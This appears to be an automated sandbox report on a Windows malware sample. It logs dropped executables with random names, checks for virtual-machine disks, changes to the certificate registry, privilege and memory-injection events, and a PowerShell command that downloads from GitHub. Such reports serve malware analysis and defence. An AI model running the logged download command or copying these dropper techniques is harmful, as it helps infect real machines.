File created C:\Windows\System\lgzCZnG.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\aMsWium.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\QCcbWSI.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\GWKLwOa.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\zVMFUTB.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\FvlHILE.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\kLZZYNV.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\YtQppQY.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\DPZtJWZ.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZUFaQja.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\nDMjUsV.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\BroTwJg.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\cbObwOa.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\TGJhwjq.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\qyvxKwt.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\zNmcogc.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fBqOjAL.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\JVbTADN.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\CAsPJil.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\EfPUVdq.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\rhHSroO.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\LwgXqOu.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\WzmGdBu.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\HCSYYXn.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\LuRfzhv.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ADvbMsW.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\yMzkrYw.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\XyWdVPN.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\IxNDkww.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\ADQCpRG.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\fzHPNbE.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\xvHCmlF.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\IEHZhDX.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\oTiyfcD.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\cNDopns.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\vKRWhxd.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\KUrFrRf.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\yfpKpiV.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\dyodzyc.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\SCHCSDZ.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\rEfEtGD.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\LBZHyTe.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\DlZExVb.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\FgmPvdN.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\SlnKHlZ.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\TjuaPSB.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
File created C:\Windows\System\mnDRJSD.exe C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3784 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3784 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kqIywdL.exe
PID 3784 wrote to memory of 2220 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kqIywdL.exe
PID 3784 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EaDLXWl.exe
PID 3784 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EaDLXWl.exe
PID 3784 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\gBlqcjd.exe
PID 3784 wrote to memory of 636 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\gBlqcjd.exe
PID 3784 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\HekKzBK.exe
PID 3784 wrote to memory of 3556 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\HekKzBK.exe
PID 3784 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\xbEfEGV.exe
PID 3784 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\xbEfEGV.exe
PID 3784 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\GsrwRjJ.exe
PID 3784 wrote to memory of 2996 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\GsrwRjJ.exe
PID 3784 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\NknEBlk.exe
PID 3784 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\NknEBlk.exe
PID 3784 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kdMVKux.exe
PID 3784 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\kdMVKux.exe
PID 3784 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SeyGcKy.exe
PID 3784 wrote to memory of 216 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SeyGcKy.exe
PID 3784 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iimELuQ.exe
PID 3784 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iimELuQ.exe
PID 3784 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\dvtpCUI.exe
PID 3784 wrote to memory of 2032 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\dvtpCUI.exe
PID 3784 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\LRcUohG.exe
PID 3784 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\LRcUohG.exe
PID 3784 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\tfiEkEl.exe
PID 3784 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\tfiEkEl.exe
PID 3784 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EXJQkpL.exe
PID 3784 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\EXJQkpL.exe
PID 3784 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iAfGyJn.exe
PID 3784 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iAfGyJn.exe
PID 3784 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\fxwkvyg.exe
PID 3784 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\fxwkvyg.exe
PID 3784 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\KKdxzOR.exe
PID 3784 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\KKdxzOR.exe
PID 3784 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\VhVDBAp.exe
PID 3784 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\VhVDBAp.exe
PID 3784 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\MHjAzkY.exe
PID 3784 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\MHjAzkY.exe
PID 3784 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\lpsaZkr.exe
PID 3784 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\lpsaZkr.exe
PID 3784 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iXdSatG.exe
PID 3784 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iXdSatG.exe
PID 3784 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ljLrXiy.exe
PID 3784 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ljLrXiy.exe
PID 3784 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ymWqDEA.exe
PID 3784 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\ymWqDEA.exe
PID 3784 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iLMcBQX.exe
PID 3784 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\iLMcBQX.exe
PID 3784 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\jDUEVYt.exe
PID 3784 wrote to memory of 2208 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\jDUEVYt.exe
PID 3784 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\YBDLdAk.exe
PID 3784 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\YBDLdAk.exe
PID 3784 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PogDzva.exe
PID 3784 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\PogDzva.exe
PID 3784 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\fzGBTwh.exe
PID 3784 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\fzGBTwh.exe
PID 3784 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SaCJqpD.exe
PID 3784 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\SaCJqpD.exe
PID 3784 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\vqSOgPu.exe
PID 3784 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\vqSOgPu.exe
PID 3784 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\gFHjYzr.exe
PID 3784 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System\gFHjYzr.exe

Processes

C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\kqIywdL.exe

C:\Windows\System\kqIywdL.exe

C:\Windows\System\EaDLXWl.exe

C:\Windows\System\EaDLXWl.exe

C:\Windows\System\gBlqcjd.exe

C:\Windows\System\gBlqcjd.exe

C:\Windows\System\HekKzBK.exe

C:\Windows\System\HekKzBK.exe

C:\Windows\System\xbEfEGV.exe

C:\Windows\System\xbEfEGV.exe

C:\Windows\System\GsrwRjJ.exe

C:\Windows\System\GsrwRjJ.exe

C:\Windows\System\NknEBlk.exe

C:\Windows\System\NknEBlk.exe

C:\Windows\System\kdMVKux.exe

C:\Windows\System\kdMVKux.exe

C:\Windows\System\SeyGcKy.exe

C:\Windows\System\SeyGcKy.exe

C:\Windows\System\iimELuQ.exe

C:\Windows\System\iimELuQ.exe

C:\Windows\System\dvtpCUI.exe

C:\Windows\System\dvtpCUI.exe

C:\Windows\System\LRcUohG.exe

C:\Windows\System\LRcUohG.exe

C:\Windows\System\tfiEkEl.exe

C:\Windows\System\tfiEkEl.exe

C:\Windows\System\EXJQkpL.exe

C:\Windows\System\EXJQkpL.exe

C:\Windows\System\iAfGyJn.exe

C:\Windows\System\iAfGyJn.exe

C:\Windows\System\fxwkvyg.exe

C:\Windows\System\fxwkvyg.exe

C:\Windows\System\KKdxzOR.exe

C:\Windows\System\KKdxzOR.exe

C:\Windows\System\VhVDBAp.exe

C:\Windows\System\VhVDBAp.exe

C:\Windows\System\MHjAzkY.exe

C:\Windows\System\MHjAzkY.exe

C:\Windows\System\lpsaZkr.exe

C:\Windows\System\lpsaZkr.exe

C:\Windows\System\iXdSatG.exe

C:\Windows\System\iXdSatG.exe

C:\Windows\System\ljLrXiy.exe

C:\Windows\System\ljLrXiy.exe

C:\Windows\System\ymWqDEA.exe

C:\Windows\System\ymWqDEA.exe

C:\Windows\System\iLMcBQX.exe

C:\Windows\System\iLMcBQX.exe

C:\Windows\System\jDUEVYt.exe

C:\Windows\System\jDUEVYt.exe

C:\Windows\System\YBDLdAk.exe

C:\Windows\System\YBDLdAk.exe

C:\Windows\System\PogDzva.exe

C:\Windows\System\PogDzva.exe

C:\Windows\System\fzGBTwh.exe

C:\Windows\System\fzGBTwh.exe

C:\Windows\System\SaCJqpD.exe

C:\Windows\System\SaCJqpD.exe

C:\Windows\System\vqSOgPu.exe

C:\Windows\System\vqSOgPu.exe

C:\Windows\System\gFHjYzr.exe

C:\Windows\System\gFHjYzr.exe

C:\Windows\System\byuocGA.exe

C:\Windows\System\byuocGA.exe

C:\Windows\System\ivViWCN.exe

C:\Windows\System\ivViWCN.exe

C:\Windows\System\JekaSyT.exe

C:\Windows\System\JekaSyT.exe

C:\Windows\System\bZFkWZA.exe

C:\Windows\System\bZFkWZA.exe

C:\Windows\System\NBvXxYp.exe

C:\Windows\System\NBvXxYp.exe

C:\Windows\System\Mjjlpit.exe

C:\Windows\System\Mjjlpit.exe

C:\Windows\System\lOZqQGH.exe

C:\Windows\System\lOZqQGH.exe

C:\Windows\System\dbuhaAs.exe

C:\Windows\System\dbuhaAs.exe

C:\Windows\System\vApkSEX.exe

C:\Windows\System\vApkSEX.exe

C:\Windows\System\JijaHxx.exe

C:\Windows\System\JijaHxx.exe

C:\Windows\System\IoDaEEN.exe

C:\Windows\System\IoDaEEN.exe

C:\Windows\System\HTRCcby.exe

C:\Windows\System\HTRCcby.exe

C:\Windows\System\BiUWJwS.exe

C:\Windows\System\BiUWJwS.exe

C:\Windows\System\jBBNUfs.exe

C:\Windows\System\jBBNUfs.exe

C:\Windows\System\CApBdtf.exe

C:\Windows\System\CApBdtf.exe

C:\Windows\System\WDcaqXZ.exe

